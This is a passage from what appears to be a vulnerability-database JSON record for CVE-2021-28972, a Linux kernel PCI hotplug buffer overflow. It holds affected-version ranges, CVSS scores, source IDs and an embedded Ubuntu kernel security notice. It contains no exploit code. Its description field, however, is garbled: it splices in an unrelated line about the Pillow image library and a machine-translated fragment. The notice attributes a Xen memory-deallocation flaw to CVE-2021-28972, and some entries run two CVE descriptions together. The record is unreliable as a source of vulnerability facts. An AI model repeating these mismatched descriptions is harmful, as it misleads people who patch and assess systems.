References: https://ubuntu.com/security/notices/USN-5343-1 CVE-2016-2853, CVE-2016-2854, CVE-2018-5995, CVE-2019-19449, CVE-2020-12655, CVE-2020-25670, CVE-2020-25671, CVE-2020-25672, CVE-2020-25673, CVE-2020-26139, CVE-2020-26147, CVE-2020-26555, CVE-2020-26558, CVE-2020-36322, CVE-2020-36385, CVE-2021-0129, CVE-2021-20292, CVE-2021-20317, CVE-2021-23134, CVE-2021-28688, CVE-2021-28972, CVE-2021-29650, CVE-2021-32399, CVE-2021-33033, CVE-2021-33034, CVE-2021-33098, CVE-2021-34693, CVE-2021-3483, CVE-2021-3506, CVE-2021-3564, CVE-2021-3573, CVE-2021-3612, CVE-2021-3679, CVE-2021-38160, CVE-2021-38198, CVE-2021-38204, CVE-2021-38208, CVE-2021-39648, CVE-2021-40490, CVE-2021-42008, CVE-2021-43389, CVE-2021-45095, CVE-2021-45469, CVE-2021-45485, CVE-2022-0492

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202103-1244",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.9.263"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.11"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.4.263"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.4.108"
      },
      {
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "34"
      },
      {
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "32"
      },
      {
        "model": "kernel",
        "scope": "gt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.15"
      },
      {
        "model": "kernel",
        "scope": "gt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.5"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.11.9"
      },
      {
        "model": "solidfire baseboard management controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.19.183"
      },
      {
        "model": "cloud backup",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.5.0"
      },
      {
        "model": "fas\\/aff baseboard management controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.10.26"
      },
      {
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "33"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.14.227"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.20"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.10"
      },
      {
        "model": "fedora",
        "scope": null,
        "trust": 0.8,
        "vendor": "fedora",
        "version": null
      },
      {
        "model": "solidfire baseboard management controller",
        "scope": null,
        "trust": 0.8,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "baseboard management controller",
        "scope": null,
        "trust": 0.8,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "cloud backup",
        "scope": null,
        "trust": 0.8,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": null,
        "trust": 0.8,
        "vendor": "linux",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-010251"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-28972"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.11.9",
                "versionStartIncluding": "5.11",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "4.19.183",
                "versionStartExcluding": "4.15",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "4.9.263",
                "versionStartExcluding": "4.5",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.10.26",
                "versionStartIncluding": "5.5.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.4.108",
                "versionStartIncluding": "4.20",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.14.227",
                "versionStartIncluding": "4.10",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.4.263",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:netapp:cloud_backup:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:netapp:solidfire_baseboard_management_controller_firmware:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:fas\\/aff_baseboard_management_controller:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-28972"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Ubuntu",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "162969"
      },
      {
        "db": "PACKETSTORM",
        "id": "162981"
      },
      {
        "db": "PACKETSTORM",
        "id": "162939"
      },
      {
        "db": "PACKETSTORM",
        "id": "166417"
      },
      {
        "db": "PACKETSTORM",
        "id": "162549"
      },
      {
        "db": "PACKETSTORM",
        "id": "166101"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202103-1260"
      }
    ],
    "trust": 1.2
  },
  "cve": "CVE-2021-28972",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.2,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.9,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Local",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 7.2,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2021-28972",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.2,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.9,
            "id": "VHN-388498",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:L/AC:L/AU:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 6.7,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 0.8,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "HIGH",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Local",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 6.7,
            "baseSeverity": "Medium",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2021-28972",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "High",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2021-28972",
            "trust": 1.8,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202103-1260",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202104-975",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-388498",
            "trust": 0.1,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2021-28972",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-388498"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-28972"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-010251"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-28972"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202103-1260"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-975"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "In drivers/pci/hotplug/rpadlpar_sysfs.c in the Linux kernel through 5.11.8, the RPA PCI Hotplug driver has a user-tolerable buffer overflow when writing a new device name to the driver from userspace, allowing userspace to write data to the kernel stack frame directly. This occurs because add_slot_store and remove_slot_store mishandle drc_name \u0027\\0\u0027 termination, aka CID-cc7a0bb058b8. Linux Kernel Exists in a classic buffer overflow vulnerability. Vendor exploits this vulnerability CID-cc7a0bb058b8 It is published as.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Pillow is a Python-based image processing library. \nThere is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. ==========================================================================\nUbuntu Security Notice USN-5343-1\nMarch 22, 2022\n\nlinux, linux-aws, linux-kvm, linux-lts-xenial vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 16.04 ESM\n- Ubuntu 14.04 ESM\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel. \n\nSoftware Description:\n- linux: Linux kernel\n- linux-aws: Linux kernel for Amazon Web Services (AWS) systems\n- linux-kvm: Linux kernel for cloud environments\n- linux-lts-xenial: Linux hardware enablement kernel from Xenial for Trusty\n\nDetails:\n\nYiqi Sun and Kevin Wang discovered that the cgroups implementation in the\nLinux kernel did not properly restrict access to the cgroups v1\nrelease_agent feature. A local attacker could use this to gain\nadministrative privileges. (CVE-2022-0492)\n\nIt was discovered that the aufs file system in the Linux kernel did not\nproperly restrict mount namespaces, when mounted with the non-default\nallow_userns option set. A local attacker could use this to gain\nadministrative privileges. (CVE-2016-2853)\n\nIt was discovered that the aufs file system in the Linux kernel did not\nproperly maintain POSIX ACL xattr data, when mounted with the non-default\nallow_userns option. A local attacker could possibly use this to gain\nelevated privileges. (CVE-2016-2854)\n\nIt was discovered that the f2fs file system in the Linux kernel did not\nproperly validate metadata in some situations. An attacker could use this\nto construct a malicious f2fs image that, when mounted and operated on,\ncould cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2019-19449)\n\nIt was discovered that the XFS file system implementation in the Linux\nkernel did not properly validate meta data in some circumstances. An\nattacker could use this to construct a malicious XFS image that, when\nmounted, could cause a denial of service. (CVE-2020-12655)\n\nKiyin (\u5c39\u4eae) discovered that the NFC LLCP protocol implementation in the\nLinux kernel contained a reference counting error. A local attacker could\nuse this to cause a denial of service (system crash). (CVE-2020-25670)\n\nKiyin (\u5c39\u4eae) discovered that the NFC LLCP protocol implementation in the\nLinux kernel did not properly deallocate memory in certain error\nsituations. A local attacker could use this to cause a denial of service\n(memory exhaustion). (CVE-2020-25671, CVE-2020-25672)\n\nKiyin (\u5c39\u4eae) discovered that the NFC LLCP protocol implementation in the\nLinux kernel did not properly handle error conditions in some situations,\nleading to an infinite loop. A local attacker could use this to cause a\ndenial of service. (CVE-2020-25673)\n\nMathy Vanhoef discovered that the Linux kernel\u2019s WiFi implementation\nincorrectly handled EAPOL frames from unauthenticated senders. A physically\nproximate attacker could inject malicious packets to cause a denial of\nservice (system crash). (CVE-2020-26139)\n\nMathy Vanhoef discovered that the Linux kernel\u2019s WiFi implementation could\nreassemble mixed encrypted and plaintext fragments. A physically proximate\nattacker could possibly use this issue to inject packets or exfiltrate\nselected fragments. (CVE-2020-26147)\n\nIt was discovered that the BR/EDR pin-code pairing procedure in the Linux\nkernel was vulnerable to an impersonation attack. A physically proximate\nattacker could possibly use this to pair to a device without knowledge of\nthe pin-code. (CVE-2020-26555)\n\nIt was discovered that the bluetooth subsystem in the Linux kernel did not\nproperly perform access control. An authenticated attacker could possibly\nuse this to expose sensitive information. (CVE-2020-26558, CVE-2021-0129)\n\nIt was discovered that the FUSE user space file system implementation in\nthe Linux kernel did not properly handle bad inodes in some situations. A\nlocal attacker could possibly use this to cause a denial of service. \n(CVE-2020-36322)\n\nIt was discovered that the Infiniband RDMA userspace connection manager\nimplementation in the Linux kernel contained a race condition leading to a\nuse-after-free vulnerability. A local attacker could use this to cause a\ndenial of service (system crash) or possible execute arbitrary code. A privileged attacker could possibly use this\nto cause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2021-20292)\n\nIt was discovered that a race condition existed in the timer implementation\nin the Linux kernel. A privileged attacker could use this to cause a denial\nof service. (CVE-2021-20317)\n\nOr Cohen and Nadav Markus discovered a use-after-free vulnerability in the\nnfc implementation in the Linux kernel. A privileged local attacker could\nuse this issue to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2021-23134)\n\nIt was discovered that the Xen paravirtualization backend in the Linux\nkernel did not properly deallocate memory in some situations. A local\nattacker could use this to cause a denial of service (memory exhaustion). A privileged attacker could use this to cause a\ndenial of service (system crash) or possibly execute arbitrary code. \n(CVE-2021-28972)\n\nIt was discovered that a race condition existed in the netfilter subsystem\nof the Linux kernel when replacing tables. A local attacker could use this\nto cause a denial of service (system crash). (CVE-2021-29650)\n\nIt was discovered that a race condition in the kernel Bluetooth subsystem\ncould lead to use-after-free of slab objects. An attacker could use this\nissue to possibly execute arbitrary code. (CVE-2021-32399)\n\nIt was discovered that the CIPSO implementation in the Linux kernel did not\nproperly perform reference counting in some situations, leading to use-\nafter-free vulnerabilities. An attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code. (CVE-2021-33033)\n\nIt was discovered that a use-after-free existed in the Bluetooth HCI driver\nof the Linux kernel. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code. (CVE-2021-33034)\n\nAsaf Modelevsky discovered that the Intel(R) Ethernet ixgbe driver for the\nLinux kernel did not properly validate large MTU requests from Virtual\nFunction (VF) devices. A local attacker could possibly use this to cause a\ndenial of service. (CVE-2021-33098)\n\nNorbert Slusarek discovered that the CAN broadcast manger (bcm) protocol\nimplementation in the Linux kernel did not properly initialize memory in\nsome situations. A local attacker could use this to expose sensitive\ninformation (kernel memory). (CVE-2021-34693)\n\n\u9a6c\u54f2\u5b87 discovered that the IEEE 1394 (Firewire) nosy packet sniffer driver in\nthe Linux kernel did not properly perform reference counting in some\nsituations, leading to a use-after-free vulnerability. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2021-3483)\n\nIt was discovered that an out-of-bounds (OOB) memory access flaw existed in\nthe f2fs module of the Linux kernel. A local attacker could use this issue\nto cause a denial of service (system crash). (CVE-2021-3506)\n\nIt was discovered that the bluetooth subsystem in the Linux kernel did not\nproperly handle HCI device initialization failure, leading to a double-free\nvulnerability. An attacker could use this to cause a denial of service or\npossibly execute arbitrary code. (CVE-2021-3564)\n\nIt was discovered that the bluetooth subsystem in the Linux kernel did not\nproperly handle HCI device detach events, leading to a use-after-free\nvulnerability. An attacker could use this to cause a denial of service or\npossibly execute arbitrary code. (CVE-2021-3573)\n\nMurray McAllister discovered that the joystick device interface in the\nLinux kernel did not properly validate data passed via an ioctl(). A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code on systems with a joystick device\nregistered. (CVE-2021-3612)\n\nIt was discovered that the tracing subsystem in the Linux kernel did not\nproperly keep track of per-cpu ring buffer state. A privileged attacker\ncould use this to cause a denial of service. (CVE-2021-3679)\n\nIt was discovered that the Virtio console implementation in the Linux\nkernel did not properly validate input lengths in some situations. A local\nattacker could possibly use this to cause a denial of service (system\ncrash). (CVE-2021-38160)\n\nIt was discovered that the KVM hypervisor implementation in the Linux\nkernel did not properly compute the access permissions for shadow pages in\nsome situations. A local attacker could use this to cause a denial of\nservice. (CVE-2021-38198)\n\nIt was discovered that the MAX-3421 host USB device driver in the Linux\nkernel did not properly handle device removal events. A physically\nproximate attacker could use this to cause a denial of service (system\ncrash). (CVE-2021-38204)\n\nIt was discovered that the NFC implementation in the Linux kernel did not\nproperly handle failed connect events leading to a NULL pointer\ndereference. A local attacker could use this to cause a denial of service. \n(CVE-2021-38208)\n\nIt was discovered that the configfs interface for USB gadgets in the Linux\nkernel contained a race condition. A local attacker could possibly use this\nto expose sensitive information (kernel memory). (CVE-2021-39648)\n\nIt was discovered that the ext4 file system in the Linux kernel contained a\nrace condition when writing xattrs to an inode. A local attacker could use\nthis to cause a denial of service or possibly gain administrative\nprivileges. (CVE-2021-40490)\n\nIt was discovered that the 6pack network protocol driver in the Linux\nkernel did not properly perform validation checks. A privileged attacker\ncould use this to cause a denial of service (system crash) or execute\narbitrary code. (CVE-2021-42008)\n\nIt was discovered that the ISDN CAPI implementation in the Linux kernel\ncontained a race condition in certain situations that could trigger an\narray out-of-bounds bug. A privileged local attacker could possibly use\nthis to cause a denial of service or execute arbitrary code. \n(CVE-2021-43389)\n\nIt was discovered that the Phone Network protocol (PhoNet) implementation\nin the Linux kernel did not properly perform reference counting in some\nerror conditions. A local attacker could possibly use this to cause a\ndenial of service (memory exhaustion). (CVE-2021-45095)\n\nWenqing Liu discovered that the f2fs file system in the Linux kernel did\nnot properly validate the last xattr entry in an inode. An attacker could\nuse this to construct a malicious f2fs image that, when mounted and\noperated on, could cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2021-45469)\n\nAmit Klein discovered that the IPv6 implementation in the Linux kernel\ncould disclose internal state in some situations. An attacker could\npossibly use this to expose sensitive information. (CVE-2021-45485)\n\nIt was discovered that the per cpu memory allocator in the Linux kernel\ncould report kernel pointers via dmesg. An attacker could use this to\nexpose sensitive information or in conjunction with another kernel\nvulnerability. (CVE-2018-5995)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 16.04 ESM:\n  linux-image-4.4.0-1103-kvm      4.4.0-1103.112\n  linux-image-4.4.0-1138-aws      4.4.0-1138.152\n  linux-image-4.4.0-222-generic   4.4.0-222.255\n  linux-image-4.4.0-222-lowlatency  4.4.0-222.255\n  linux-image-aws                 4.4.0.1138.143\n  linux-image-generic             4.4.0.222.229\n  linux-image-kvm                 4.4.0.1103.101\n  linux-image-lowlatency          4.4.0.222.229\n  linux-image-virtual             4.4.0.222.229\n\nUbuntu 14.04 ESM:\n  linux-image-4.4.0-1102-aws      4.4.0-1102.107\n  linux-image-4.4.0-222-generic   4.4.0-222.255~14.04.1\n  linux-image-4.4.0-222-lowlatency  4.4.0-222.255~14.04.1\n  linux-image-aws                 4.4.0.1102.100\n  linux-image-generic-lts-xenial  4.4.0.222.193\n  linux-image-lowlatency-lts-xenial  4.4.0.222.193\n  linux-image-virtual-lts-xenial  4.4.0.222.193\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. \n\nReferences:\n  https://ubuntu.com/security/notices/USN-5343-1\n  CVE-2016-2853, CVE-2016-2854, CVE-2018-5995, CVE-2019-19449,\n  CVE-2020-12655, CVE-2020-25670, CVE-2020-25671, CVE-2020-25672,\n  CVE-2020-25673, CVE-2020-26139, CVE-2020-26147, CVE-2020-26555,\n  CVE-2020-26558, CVE-2020-36322, CVE-2020-36385, CVE-2021-0129,\n  CVE-2021-20292, CVE-2021-20317, CVE-2021-23134, CVE-2021-28688,\n  CVE-2021-28972, CVE-2021-29650, CVE-2021-32399, CVE-2021-33033,\n  CVE-2021-33034, CVE-2021-33098, CVE-2021-34693, CVE-2021-3483,\n  CVE-2021-3506, CVE-2021-3564, CVE-2021-3573, CVE-2021-3612,\n  CVE-2021-3679, CVE-2021-38160, CVE-2021-38198, CVE-2021-38204,\n  CVE-2021-38208, CVE-2021-39648, CVE-2021-40490, CVE-2021-42008,\n  CVE-2021-43389, CVE-2021-45095, CVE-2021-45469, CVE-2021-45485,\n  CVE-2022-0492\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-28972"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-010251"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-975"
      },
      {
        "db": "VULHUB",
        "id": "VHN-388498"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-28972"
      },
      {
        "db": "PACKETSTORM",
        "id": "162969"
      },
      {
        "db": "PACKETSTORM",
        "id": "162981"
      },
      {
        "db": "PACKETSTORM",
        "id": "162939"
      },
      {
        "db": "PACKETSTORM",
        "id": "166417"
      },
      {
        "db": "PACKETSTORM",
        "id": "162549"
      },
      {
        "db": "PACKETSTORM",
        "id": "166101"
      }
    ],
    "trust": 2.88
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2021-28972",
        "trust": 4.0
      },
      {
        "db": "PACKETSTORM",
        "id": "162939",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "162981",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "162549",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "166417",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-010251",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202103-1260",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "166101",
        "trust": 0.7
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1625",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1299",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1307",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1964",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1919",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1946",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.1225",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1669",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2136",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1231",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1655",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1694",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021092209",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021041363",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-975",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "162969",
        "trust": 0.2
      },
      {
        "db": "CNVD",
        "id": "CNVD-2021-24272",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-388498",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-28972",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-388498"
      },
      {
